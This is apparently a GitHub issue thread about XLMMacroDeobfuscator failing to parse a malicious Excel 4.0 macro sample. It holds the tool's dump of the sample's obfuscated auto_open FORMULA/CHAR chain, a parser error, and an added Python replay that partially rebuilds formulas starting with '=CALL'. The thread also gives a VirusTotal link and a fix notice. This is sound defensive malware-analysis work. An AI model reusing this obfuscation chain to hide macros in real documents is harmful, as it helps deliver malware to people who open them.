Closed seanthegeek closed 2 years ago
Deobfuscating the following malicious macro fails
auto_open: auto_open->GERGEGSFWG!$F$1
SHEET: GERGEGSFWG, macrosheet CELL:F9, =FORMULA(Vuk1!C17, Vuk2!C14)=FORMULA(Vuk2!G8, Vuk3!D13)=FORMULA(Vuk3!I5, Vuk4!G7)=FORMULA(Vuk4!B13, Vuk5!E2)=FORMULA(Vuk5!D19, Vuk6!B13)=FORMULA(Vuk6!I4, Vuk7!F8)=FORMULA(Vuk7!B14, Vuk1!F2)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!D6&Vuk7!F8&Sssssbvr1!B15&Vuk7!F8&Sssssbvr1!F11&Vuk7!F8&Sssssbvr1!H3&Vuk7!F8&Sssssbvr1!J8&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30), False
SHEET: Vuk1, macrosheet CELL:C17, =CHAR(CCwdbuk1!C54), =
SHEET: Vuk2, macrosheet CELL:G8, =CHAR(CCwdbuk1!E49), A
SHEET: Vuk3, macrosheet CELL:I5, =CHAR(CCwdbuk1!H48), L
SHEET: Vuk4, macrosheet CELL:B13, =CHAR(CCwdbuk1!L52), e
SHEET: Vuk5, macrosheet CELL:D19, =CHAR(CCwdbuk1!P50), C
SHEET: Vuk6, macrosheet CELL:I4, =CHAR(CCwdbuk1!Q55), r
SHEET: Vuk7, macrosheet CELL:B14, =CHAR(CCwdbuk1!B48), o
auto_open: auto_open->GERGEGSFWG!$F$1
[Starting Deobfuscation]
Error [deobfuscator.py:2580 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', 'CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30)') at line 1, column 350.
Expected one of:
	* QUOTE
	* EXCLAMATION
	* NUMBER
	* LBRACE
	* L_PRA
	* ERROR
	* BOOLEAN
	* ROW
	* /\$?([a-qs-z][a-z]?)\$?\d+\b|\$?(r[a-bd-z]?)\$?\d+\b(?!C)/i
	* NAME
	* STRING
Previous tokens: [Token('CONCATOP', '&')]
Files:
[END of Deobfuscation]
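The dump above already shows how this sample is built: each Vuk sheet holds one CHAR() cell, F9 chains fifteen FORMULA() calls behind `=` comparisons so that a single cell executes all of them, the first seven copy single characters into scratch cells, and the later ones concatenate those scratch cells with cells from Sssssbvr1, Sssssbvr2 and CCwdbuk1 (whose values the dump does not show) into new formulas. The following Python is an added example, not code from the issue or from XLMMacroDeobfuscator: it replays that chain with the seven character values the dump gives and leaves every other cell as a `{Sheet!Cell}` placeholder, so the partially recovered formulas and the remaining gaps are visible without a working parser. The seven known values and the F9 formula are copied from the dump; the evaluator itself only understands `&` concatenation of references and quoted strings, which is all this formula uses.

```python
import re
from typing import Dict, List

# Seed values copied from the XLMMacroDeobfuscator dump above.  These are the
# only cell contents the dump reveals; everything else referenced by F9 is
# unknown and will appear as a {Sheet!Cell} placeholder in the output.
KNOWN_CELLS: Dict[str, str] = {
    "Vuk1!C17": "=", "Vuk2!G8": "A", "Vuk3!I5": "L", "Vuk4!B13": "e",
    "Vuk5!D19": "C", "Vuk6!I4": "r", "Vuk7!B14": "o",
}

# The auto_open entry point GERGEGSFWG!F9, copied verbatim from the dump and
# split one FORMULA() call per line for readability.
F9_SHEET = "GERGEGSFWG"
F9_FORMULA = (
    "=FORMULA(Vuk1!C17, Vuk2!C14)"
    "=FORMULA(Vuk2!G8, Vuk3!D13)"
    "=FORMULA(Vuk3!I5, Vuk4!G7)"
    "=FORMULA(Vuk4!B13, Vuk5!E2)"
    "=FORMULA(Vuk5!D19, Vuk6!B13)"
    "=FORMULA(Vuk6!I4, Vuk7!F8)"
    "=FORMULA(Vuk7!B14, Vuk1!F2)"
    "=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!D6&Vuk7!F8&Sssssbvr1!B15&Vuk7!F8&Sssssbvr1!F11&Vuk7!F8&Sssssbvr1!H3&Vuk7!F8&Sssssbvr1!J8&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)"
    "=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)"
    "=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)"
    "=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)"
    "=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)"
    "=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)"
    "=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)"
    "=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30)"
)


def split_top_level_calls(formula: str) -> List[str]:
    """Split '=F(...)=F(...)...' into the individual '=F(...)' calls.

    Excel evaluates both operands of every '=' comparison, so each FORMULA()
    in the chain runs for its side effect (a cell write) and the chain as a
    whole only yields a boolean, the cached 'False' shown for F9 in the dump.
    """
    calls, depth, start = [], 0, 0
    for i, ch in enumerate(formula):
        if ch == "(":
            if depth == 0:
                start = formula.rfind("=", 0, i)  # the '=' opening this call
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                calls.append(formula[start:i + 1])
    return calls


def qualify(ref: str, sheet: str) -> str:
    """Normalise a reference: drop '$' anchors and qualify bare refs with the sheet."""
    ref = ref.strip().replace("$", "")
    return ref if "!" in ref else f"{sheet}!{ref}"


def evaluate(expr: str, cells: Dict[str, str], sheet: str) -> str:
    """Evaluate a '&' concatenation of cell references and "quoted" literals.

    Unknown cells become {Sheet!Cell} so the result still shows which
    characters are recovered and where the gaps are.  Literals containing a
    literal '&' are not handled; this sample uses none.
    """
    out = []
    for term in expr.split("&"):
        term = term.strip()
        if len(term) >= 2 and term[0] == term[-1] == '"':
            out.append(term[1:-1])
        else:
            key = qualify(term, sheet)
            out.append(cells.get(key, "{" + key + "}"))
    return "".join(out)


def run_formula_chain(formula: str, sheet: str, cells: Dict[str, str]) -> Dict[str, str]:
    """Replay each FORMULA(src, dst) write; return the written cells in order."""
    written: Dict[str, str] = {}
    for call in split_top_level_calls(formula):
        if not call.startswith("=FORMULA("):
            continue
        src, dst = call[len("=FORMULA("):-1].rsplit(",", 1)
        target = qualify(dst, sheet)
        value = evaluate(src, cells, sheet)
        cells[target] = value  # later calls read what earlier calls wrote
        written[target] = value
    return written


def recover(formula: str = F9_FORMULA, sheet: str = F9_SHEET) -> Dict[str, str]:
    """Replay F9 against a fresh copy of the known cells."""
    return run_formula_chain(formula, sheet, dict(KNOWN_CELLS))


def error_column(formula: str = F9_FORMULA) -> int:
    """1-based column of the first CCwdbuk1!H24 reference, where the parser stopped."""
    return formula.index("CCwdbuk1!H24") + 1


if __name__ == "__main__":
    for cell, value in recover().items():
        print(f"{cell:18} {value}")
    print("parser stopped at column", error_column())
```

Running it prints the seven single-character copies first and then the reconstructed formulas in F15 through F30; F15, F17, F19 and F21 all begin with `=CALL`, with placeholders marking the Sssssbvr1/Sssssbvr2/CCwdbuk1 cells still needed, and `error_column()` lands on 350, the position the parser error above reports, which is the first `CCwdbuk1!H24` reference following `Vuk6!B13&`.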
Please share the sample or, if it is on VT, its hash so I can test it. You can reach me directly via DM on Twitter if you do not want to share the info here.
https://www.virustotal.com/gui/file/714469E1B0F10CE91DD8104A064A85586E29803B780C4F6AF829745B9BBD38B1
The issue is fixed in v2.3.4.